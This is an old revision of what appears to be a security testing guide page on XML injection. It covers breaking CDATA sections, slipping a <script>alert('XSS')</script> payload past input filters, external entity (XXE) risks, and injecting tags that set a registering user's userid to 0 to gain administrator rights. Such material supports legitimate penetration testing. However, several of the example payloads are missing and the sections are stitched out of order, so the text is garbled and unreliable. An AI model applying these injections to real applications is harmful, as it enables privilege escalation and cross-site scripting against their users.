Revision as of 14:01, 15 November 2006

Brief Summary

We talk about XML Injection testing when we try to inject a particular XML doc to the application: if the XML parser fails to make an appropriate data validation the test will results positive.

Short Description of the Issue

In this section we describe a pratical example of XML Injection: first we define an xml style communication, and we show how it works. Then we describe the discovery method in which we try to insert xml metacharacters.
Once the first step is accomplished, the tester will have some informations about xml structure, so it will be possible to try to inject xml data and tags (Tag Injection).

Black Box testing and example

Let's suppose there is a web application using an xml style communication
in order to perform users registration.
This is done by creating and adding a new <user> node on an xmlDb file.
Let's suppose xmlDB file is like the following:

but as &foo doesn't has a final ';' and moreover &foo; entity is defined nowhere so xml is not valid as well.

CDATA begin/end tags: <![CDATA[ / ]]> - When CDATA tag is used, every character enclosed by it is not parsed by xml parser.

Often this is used when there are metacharacters inside a text node
which are to be considered as text values.

For example if there is the need to represent the string '<foo>' inside a text node
it could be used CDATA in the following way:

<node>
<![CDATA[<foo>]]>
</node>

so that '<foo>' won't be parsed and will be considered as a text value.

In case a node is built in the following way:

<username><![CDATA[<$userName]]></username>

the tester could try to inject the end CDATA sequence ']]>' in order to try to invalidate xml.

userName = ]]>

this will become:

<username><![CDATA[]]>]]></username>

which is not a valid xml representation.

External Entity:

Another test is related to CDATA tag. When the XML document will be parsed, the CDATA value will be eliminated, so it is possible to add a script if the tag contents will be showed in the HTML page.
Suppose to have a node containing text that will be displayed at the user. If this text could be modified, as the following:

<html>
$HTMLCode
</html>

it is possible to avoid input filter by insert an HTML text that uses CDATA tag. For example inserting the following value:

that in analysis phase will eliminate the CDATA tag and will insert the following value in the HTML:

<script>alert('XSS')</script>

In this case the application will be exposed at a XSS vulnerability. So we can insert some code inside the CDATA tag to avoid the input validation filter.

Entity:
It's possible to define an entity using the DTDs. Entity-name as &. is an example of entity. It's possible to specify a URL as entity: in this way you create a possible vulnerability by XML External Entity (XEE). So, the last test to try is formed by the following strings:

The resulting xml file will be well formed and it is likely that the userid tag
will be cosidered with the latter value (0 = admin id).
The only shortcoming is that userid tag exists two times in the last user node, and
often xml file is associated with a schema or a dtd.
Let's suppose now that xml structure has the following DTD:

This way original userid tag will be commented out and the one injected will be
parsed in compliance to DTD rules.
The result is that user 'tony' will be logged with userid=0 ( which could be an administrator uid)